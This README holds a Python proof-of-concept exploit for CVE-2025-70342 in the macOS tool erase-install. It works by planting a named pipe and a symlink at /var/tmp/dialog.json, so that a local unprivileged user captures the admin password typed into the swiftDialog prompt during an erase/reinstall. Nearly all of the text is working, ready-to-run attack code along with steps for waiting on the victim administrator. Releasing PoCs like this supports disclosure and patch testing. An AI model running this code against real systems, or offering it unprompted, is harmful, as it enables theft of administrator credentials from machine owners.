README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-70342: Credential Interception in erase-install
erase-install <= v40.4 writes swiftDialog credential output to the
hardcoded path /var/tmp/dialog.json. On Apple Silicon Macs, admin
credentials entered during erase/reinstall are written to this
predictable location in a world-writable directory.
A local unprivileged attacker creates a named pipe (FIFO) and symlink
at the target path to intercept credentials in real time.
Prerequisites:
- Apple Silicon Mac (password prompt only happens on arm64)
- Any local user account (no special privileges)
Usage:
python3 poc.py # Create FIFO + symlink, wait for creds
python3 poc.py --cleanup
Attack:
1. Run this script (creates FIFO + symlink, blocks waiting)
2. Admin runs: sudo erase-install.sh --erase
3. Admin enters password in swiftDialog prompt
4. Password flows through FIFO, printed to stdout
Disclaimer:
For educational and authorized security testing only.
Only use on systems you own or have explicit permission to test.
"""
import argparse
import os
DIALOG_OUTPUT = "/var/tmp/dialog.json"
FIFO_PATH = "/tmp/.dialog-fifo"
def watch():
if os.path.exists(FIFO_PATH):
os.unlink(FIFO_PATH)
os.mkfifo(FIFO_PATH)
if os.path.exists(DIALOG_OUTPUT):
os.unlink(DIALOG_OUTPUT)
os.symlink(FIFO_PATH, DIALOG_OUTPUT)
print(f"[+] FIFO: {FIFO_PATH}")
print(f"[+] Symlink: {DIALOG_OUTPUT} -> {FIFO_PATH}")
print(f"[*] Waiting for credentials...")
with open(FIFO_PATH, 'r') as fifo:
data = fifo.read()
print(f"[+] Captured:\n{data}")
def cleanup():
if os.path.islink(DIALOG_OUTPUT):
os.unlink(DIALOG_OUTPUT)
print(f"[+] Removed: {DIALOG_OUTPUT}")
if os.path.exists(FIFO_PATH):
os.unlink(FIFO_PATH)
print(f"[+] Removed: {FIFO_PATH}")
def main():
parser = argparse.ArgumentParser(
description="CVE-2025-70342: erase-install credential interception PoC"
)
parser.add_argument("--cleanup", action="store_true",
help="Remove FIFO and symlink")
args = parser.parse_args()
if args.cleanup:
cleanup()
else:
watch()
if __name__ == "__main__":
main()